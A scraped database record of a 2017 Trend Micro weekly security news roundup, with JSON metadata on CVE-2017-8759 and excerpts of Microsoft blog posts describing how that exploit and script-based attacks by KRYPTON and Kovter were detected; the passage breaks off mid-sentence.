ID TRENDMICROBLOG:1C7972C77614398819AB69B2345DA453 Type trendmicroblog Reporter Jon Clay Modified 2017-11-22T14:00:16
Description
Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.
Below you’ll find a quick recap of topics followed by links to news articles and/or our blog posts providing additional insight. Be sure to check back each Friday for highlights of the goings-on each week!
_As seen in recent attacks, such as Bad Rabbit and NotPetya, a new style of hacking has emerged. This style of attack leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar.__ _
_The value of bitcoin briefly took a dip on Monday evening after a big theft allegedly affected a separate virtual currency system called Tether. The Tether team said they would blacklist the address, so the $30,950,010 worth of tokens stolen in the hack could not be converted into U.S. dollars. __ _
The waves of backdoor-laden spam emails that targeted Russian-speaking businesses earlier this year were part of Cobalt’s bigger campaigns. In their recent campaigns, they used two different infection chains, with social engineering hooks that were designed to invoke a sense of urgency in its recipients.
Hackers looking for a payout have hit the Sacramento Regional Transit (SacRT) system, defacing the agency website, erasing data from some of its servers, and demanding money to stop the attack and not do further damage. _SacRT decided not to respond to the message or pay up.__ _
_U.S. prosecutors have charged an Iranian-based hacker, Behzad Mesri, with penetrating the network of cable TV provider HBO and stealing episodes and plot summaries for unaired programs including “Game of Thrones,” then threatening to release the data unless he was paid $6 million.__ _
UK pawnbroker Cash Converters_ revealed that it was the victim of a data breach that could have exposed sensitive data, including customer usernames, passwords, delivery addresses, financial data and other personal details after it sent emails to customers warning about the incident. __ _
_October’s macOS security update contained a fix for a vulnerability that was disclosed to Apple earlier this year. The vulnerability was in the tool system that checks for and fixes errors in devices formatted with the FAT filesystem, and is automatically invoked by macOS when a device using FAT is inserted.__ _
In the past, on premise versions of security solutions were held up by long development cycles and significant regression periods. These delays prevented customers from getting improved methods of defense quickly and deployed to a data center, leaving them vulnerable to attacks.
_Mac laptop and mini users often struggle to optimally use their computer’s memory or to keep their disk clean. Trend Micro’s Dr. Cleaner Pro can help your Mac perform at its best. Its powerful optimization tools can quickly free up memory and disk space.__ _
_Trend Micro’s Deep Security delivers multiple capabilities managed through a single connected dashboard with full visibility into leading environments like VMware, AWS, Microsoft Azure and Docker and is key for a modern threat defense solution allowing skilled resources to focus on business goals.__ _
_Mac versus PC, Apple versus Android. It’s a war that’s born a thousand memes, hundreds of advertising campaigns, and billions of search queries. In the security game, Apple have always had reasonable cause to be a little smug.__ _
Please add your thoughts in the comments below or follow me on Twitter; @JonLClay.
{"cvelist": ["CVE-2017-8759"], "id": "TRENDMICROBLOG:1C7972C77614398819AB69B2345DA453", "type": "trendmicroblog", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days.\n\nBelow you\u2019ll find a quick recap of topics followed by links to news articles and/or our blog posts providing additional insight. Be sure to check back each Friday for highlights of the goings-on each week!\n\n \n\n[**Beware of \u2018Double Whammy\u2019 Cyberattacks**](<http://blog.trendmicro.com/double-whammy-when-one-attack-masks-another-attack/>)\n\n_As seen in recent attacks, such as Bad Rabbit and NotPetya, a new style of hacking has emerged. This style of attack leverages not one, but two separate malware-supported attacks. In this setup, one attack serves as a distraction, masking the malicious activities of the other malware as it flies under the radar.__ _\n\n[**Bitcoin and Ethereum Prices Took a Hit after another Cryptocurrency Was Hacked**](<http://fortune.com/2017/11/21/bitcoin-price-ethereum-price-tether-hacked/>)\n\n_The value of bitcoin briefly took a dip on Monday evening after a big theft allegedly affected a separate virtual currency system called Tether. The Tether team said they would blacklist the address, so the $30,950,010 worth of tokens stolen in the hack could not be converted into U.S. dollars. __ _\n\n[**Cobalt Strikes Russian Banks Again**](<http://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/>)\n\n_The waves of backdoor-laden spam emails that targeted Russian-speaking businesses earlier this year were part of Cobalt\u2019s bigger campaigns. In their recent campaigns, they used two different infection chains, with social engineering hooks that were designed to invoke a sense of urgency in its recipients._** **\n\n[**Hackers Demand Money to Stop Attack on Sacramento\u2019s Transit System**](<https://www.helpnetsecurity.com/2017/11/21/sacramento-regional-transit-hack/>)\n\n_Hackers looking for a payout have hit the Sacramento Regional Transit (SacRT) system, defacing the agency website, erasing data from some of its servers, and demanding money to stop the attack and not do further damage._ _SacRT decided not to respond to the message or pay up.__ _\n\n[**U.S. Prosecutors Charge Iranian Hacker Group in 'Game of Thrones' Hack**](<https://www.reuters.com/article/us-cyber-hbo-indictment/u-s-prosecutors-charge-iranian-in-game-of-thrones-hack-idUSKBN1DL1YT>)\n\n_U.S. prosecutors have charged an Iranian-based hacker, Behzad Mesri, with penetrating the network of cable TV provider HBO and stealing episodes and plot summaries for unaired programs including \u201cGame of Thrones,\u201d then threatening to release the data unless he was paid $6 million.__ _\n\n[**Hackers Stole Information from UK-based Pawnbroker Cash Converters Website**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/hackers-steal-information-from-uk-based-pawnbroker-cash-converters-website>)\n\n_UK pawnbroker _[_Cash Converters_](<https://www.cashconverters.com/>)_ revealed that it was the victim of a data breach that could have exposed sensitive data, including customer usernames, passwords, delivery addresses, financial data and other personal details after it sent emails to customers warning about the incident. __ _\n\n[**October MacOS Patch Fixes FAT Vulnerability**](<http://blog.trendmicro.com/trendlabs-security-intelligence/october-macos-patch-fixes-fatusb-vulnerability/>)\n\n_October\u2019s macOS security update contained a fix for a vulnerability that was disclosed to Apple earlier this year. The vulnerability was in the tool system that checks for and fixes errors in devices formatted with the FAT filesystem, and is automatically invoked by macOS when a device using FAT is inserted.__ _\n\n[**Customers Drive Rapid Innovation for Hybrid Cloud Security**](<http://blog.trendmicro.com/customer-driven-rapid-innovation-hybrid-cloud-security/>)\n\n_In the past, on premise versions of security solutions were held up by long development cycles and significant regression periods. These delays prevented customers from getting improved methods of defense quickly and deployed to a data center, leaving them vulnerable to attacks._\n\n[**Optimize Your Mac**](<http://blog.trendmicro.com/optimize-your-mac/>)\n\n_Mac laptop and mini users often struggle to optimally use their computer\u2019s memory or to keep their disk clean. Trend Micro\u2019s Dr. Cleaner Pro can help your Mac perform at its best. Its powerful optimization tools can quickly free up memory and disk space.__ _\n\n[**Trend Micro Protects VMware on Amazon Web Services**](<http://blog.trendmicro.com/trend-micro-protects-vmware-amazon-web-services/>)\n\n_Trend Micro\u2019s Deep Security delivers multiple capabilities managed through a single connected dashboard with full visibility into leading environments like VMware, AWS, Microsoft Azure and Docker and is key for a modern threat defense solution allowing skilled resources to focus on business goals.__ _\n\n[**Macs Won\u2019t Protect You from Cyberattacks**](<http://www.huffingtonpost.co.uk/entry/think-having-a-mac-protects-you-from-cyber-attack-no-longer_uk_5a1400f2e4b05ec0ae844555>)\n\n_Mac versus PC, Apple versus Android. It\u2019s a war that\u2019s born a thousand memes, hundreds of advertising campaigns, and billions of search queries. In the security game, Apple have always had reasonable cause to be a little smug.__ _\n\nPlease add your thoughts in the comments below or follow me on Twitter; [@JonLClay.](<https://twitter.com/jonlclay>)", "lastseen": "2017-11-26T20:03:00", "enchantments_done": [], "reporter": "Jon Clay", "href": "https://blog.trendmicro.com/week-security-news-65/", "modified": "2017-11-22T14:00:16", "title": "This Week in Security News", "viewCount": 191, "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "bulletinFamily": "blog", "references": [], "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2017-11-26T20:03:00", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:6CA719CE-A47A-414E-8DBA-FFE14F20C0FF"]}, {"type": "cve", "idList": ["CVE-2017-8759"]}, {"type": "mmpc", "idList": ["MMPC:6B8C3A836431A67926F568B51D67E59F", "MMPC:C13F25080AC9B1B34AF77630B988E9E8", "MMPC:30A997667BFA925FD541E3DCB1F1DEB6", "MMPC:69455AB621A495CAB62392B8DB0987B3"]}, {"type": "symantec", "idList": ["SMNTC-100742"]}, {"type": "fireeye", "idList": ["FIREEYE:A19A2394490AB386D95215A17EEA2FC0", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11"]}, {"type": "seebug", "idList": ["SSV:96484"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516", "MYHACK58:62201789305", "MYHACK58:62201789251", "MYHACK58:62201789425"]}, {"type": "kaspersky", "idList": ["KLA11101"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:144148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:36D857BF71D07CAE276BCB26AC34D574", "TALOSBLOG:F661E733634AB3D9655B38A94F050A82"]}, {"type": "mskb", "idList": ["KB4041083", "KB4041086", "KB4041093", "KB4041092", "KB4041085", "KB4041090", "KB4041084", "KB4041091"]}, {"type": "cert", "idList": ["VU:101048"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_SEP_4038799.NASL", "SMB_NT_MS17_SEP_4041083.NASL", "SMB_NT_MS17_SEP_WIN2008.NASL", "SMB_NT_MS17_SEP_4038792.NASL", "SMB_NT_MS17_SEP_4038781.NASL", "SMB_NT_MS17_SEP_4038788.NASL", "SMB_NT_MS17_SEP_4038782.NASL", "SMB_NT_MS17_SEP_4038783.NASL"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:30A997667BFA925FD541E3DCB1F1DEB6"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:BF5C8288A392CBC3E7947C012FB8E11E"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310811321", "OPENVAS:1361412562310811325", "OPENVAS:1361412562310811816", "OPENVAS:1361412562310811324", "OPENVAS:1361412562310811829", "OPENVAS:1361412562310811326", "OPENVAS:1361412562310811827", "OPENVAS:1361412562310811323", "OPENVAS:1361412562310811322", "OPENVAS:1361412562310811828"]}, {"type": "exploitdb", "idList": ["EDB-ID:42711"]}, {"type": "zdt", "idList": ["1337DAY-ID-28535"]}, {"type": "threatpost", "idList": ["THREATPOST:D1D63DCBBB39C340EEEDB2544F4C7DB3", "THREATPOST:7E6EDF53838EEFD3BEAC32130CE58C38", "THREATPOST:742E793D712CB6B2F049DBEA5373016E"]}, {"type": "krebs", "idList": ["KREBS:F0163956314C713411403F8497E4F9A4"]}, {"type": "thn", "idList": ["THN:5AD427A8B33BDFD2EE553727C6CE4EE0", "THN:5133F80C8A11FE7678A971A326DDA682", "THN:C21D17F1D92C12B031AB9C761BBD004A"]}, {"type": "securelist", "idList": ["SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D", "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:D257E8B7FC070ED8409973F0F9A689E6", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:197219DC341BA8DE850FF6435F75C3A4", "MALWAREBYTES:2D17A77CBCBBFFE150012C3B71E53FC6"]}, {"type": "canvas", "idList": ["OFFICE_WSDL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:B52BDC456D269490B2D446E678D17295"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:5232F354244FCA9F40053F10BE385E28"]}], "modified": "2017-11-26T20:03:00", "rev": 2}, "vulnersScore": 6.0}, "published": "2017-11-22T14:00:16"}
{"attackerkb": [{"lastseen": "2020-11-18T06:40:18", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": "Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka \u201c.NET Framework Remote Code Execution Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:51pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 \n\n * Associated Malware: FINSPY, FinFisher, WingBird \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133f>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-23T00:00:00", "published": "2017-09-13T00:00:00", "id": "AKB:6CA719CE-A47A-414E-8DBA-FFE14F20C0FF", "href": "https://attackerkb.com/topics/GLG8LUMeGO/cve-2017-8759", "type": "attackerkb", "title": "CVE-2017-8759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T13:07:50", "description": "Microsoft .NET Framework 2.0, 3.5, 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2 and 4.7 allow an attacker to execute code remotely via a malicious document or application, aka \".NET Framework Remote Code Execution Vulnerability.\"", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-13T01:29:00", "title": "CVE-2017-8759", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8759"], "modified": "2018-01-14T02:29:00", "cpe": ["cpe:/a:microsoft:.net_framework:3.5.1", "cpe:/a:microsoft:.net_framework:3.5", "cpe:/a:microsoft:.net_framework:4.6.1", "cpe:/a:microsoft:.net_framework:4.7", "cpe:/a:microsoft:.net_framework:2.0", "cpe:/a:microsoft:.net_framework:4.6.2", "cpe:/a:microsoft:.net_framework:4.5.2", "cpe:/a:microsoft:.net_framework:4.6"], "id": "CVE-2017-8759", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8759", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:.net_framework:4.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:2.0:sp2:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:4.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:.net_framework:3.5:*:*:*:*:*:*:*"]}], "mmpc": [{"lastseen": "2017-12-25T20:11:46", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "The [September 12, 2017 security updates from Microsoft](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759>) include the patch for a previously unknown vulnerability exploited through Microsoft Word as an entry vector. Customers using Microsoft advanced threat solutions were already protected against this threat.\n\nThe vulnerability, classified as [CVE-2017-8759](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>), was used in limited targeted attacks and reported to us by our partner, FireEye. Microsoft would like to thank FireEye for responsibly [reporting this vulnerability](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) and for working with us to protect customers.\n\nCustomers receiving automatic updates for Microsoft products are protected from this attack without any additional action required. Customers not enjoying the benefits of automatic updates should consider immediately applying this month\u2019s updates to avoid unnecessary exposure.\n\n## Office 365 ATP and Windows Defender ATP customers protected\n\nCustomers running Microsoft advanced threat solutions such as [Office 365 Advanced Threat Protection](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>) or [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) were safe from this attack without the need of additional updates. The security configuration and reduced attack surface of [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) blocks this attack by default.\n\n[Office 365 ATP](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>) blocked the malicious attachments automatically in customer environments that have adopted the mail detonation and filtering solution. The attachment was blocked based on the detection of the malicious behaviors, as well as its similarity with previous exploits. SecOps personnel would see an ATP behavioral detection in Office 365\u2019s Threat Explorer page:\n\n\n\n_Figure 1. Block reasons for the exploit attachment as seen in Office 365 ATP console_\n\n[Windows Defender ATP](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) was also able to raise multiple alerts related to post-exploitation activities performed by this exploit using scripting engines and PowerShell. Additional alerts may also be visible for subsequent stages of the attack performed after malware installation.\n\nIn addition, [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) detects and blocks exploits for this vulnerability as Exploit:RTF/Fitipol.A, Behavior:Win32/Fitipol.A, and Exploit:RTF/CVE-2017-8759.A using the cloud protection service, which delivers near-real-time protection against such never-before-seen threats.\n\n\n\n_Figure 2. Windows Defender ATP alerts raised for CVE-2017-8759 zero-day exploit_\n\n## Protection with Windows Defender Exploit Guard\n\nWe are also happy to share with customers testing our upcoming Windows 10 Fall Creators Update that [Windows Defender Exploit Guard](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/whats-new-in-windows-defender-atp-fall-creators-update/>) was also able to prevent this attack using one of the many Attack Surface Reduction rules and exploit protection features.\n\n\n\n_Figure 3. Example of exploit blocking event logged by Windows Defender Exploit Guard_\n\n[Windows Defender Exploit Guard](<https://aka.ms/wdegdocs>) is part of the defense-in-depth protection in the [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>) release.\n\n## Another zero-day leading to FinFisher\n\nThe [CVE-2017-8759](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8759>) vulnerability can allow remote code execution after users open a spam email, and double-click on an untrusted attachment and disable the Microsoft Office _Protected View_ mode. The exploit uses Microsoft Word as the initial vector to reach the real vulnerable component, which is not related to Microsoft Office and which is responsible for certain SOAP-rendering functionalities through .NET classes.\n\nFor more information on this new campaign our partner FireEye has a good [technical blog](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>) describing the infection mechanism and the details of the exploit.\n\nAfter the initial notification from FireEye, Windows Defender telemetry revealed very limited usage of this zero-day exploit. The attacker used this exploit to deploy a spyware detected as [Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>) and also known to the security community as \u201c[FinFisher](<https://en.wikipedia.org/wiki/FinFisher>)\u201d, a commercial surveillance package often seen combined with expensive zero-day vulnerabilities and used by sophisticated actors.\n\nMicrosoft researchers believe that the adversary involved in this operation could be linked to the [NEODYMIUM group](<http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf>), which has used similar zero-day exploits with spear-phishing attachments combined with the usage of FinFisher spyware. We previously reported about the NEODYMIUM group in the [Windows Security blog](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>) in 2016. For additional information about this new attack as well as other NEODYMIUM attacks, we encourage ATP customers to review the in-product Threat Intelligence reports on this activity group.\n\n\n\n \n\n \n\n**_Elia Florio_**\n\n_Windows Defender ATP Research Team_\n\n#### \n\n \n\n \n\n### Related blog posts\n\n[Office 365 Advanced Threat Protection defense for corporate networks against recent Office exploit attacks](<https://cloudblogs.microsoft.com/microsoftsecure/2017/11/21/office-365-advanced-threat-protection-defense-for-corporate-networks-against-recent-office-exploit-attacks/>)\n\n[Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe](<https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/>)\n\n \n\n \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "modified": "2017-09-12T18:46:50", "published": "2017-09-12T18:46:50", "id": "MMPC:69455AB621A495CAB62392B8DB0987B3", "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/", "title": "Exploit for CVE-2017-8759 detected and neutralized", "type": "mmpc", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-16T23:59:41", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the landstaying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps make them effective vehicles for delivering malicious implants through social engineering as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. During these latter stages, the scripting engine of choice is clearly PowerShellthe _de facto_ scripting standard for administrative tasks on Windowswith the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters doin a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years analyzing script-based malware, weve added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it is impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasksthey often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2-ams-ml-krypton-lure.png>)\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesnt drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure _2_. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTONs evasion mechanisms by capturing JavaScript API calls after they have been decrypted and ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nNot only advanced activity groups like KRYPTON are shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. This payload resides in a PowerShell script decoded by a JavaScript (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure _6_. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile 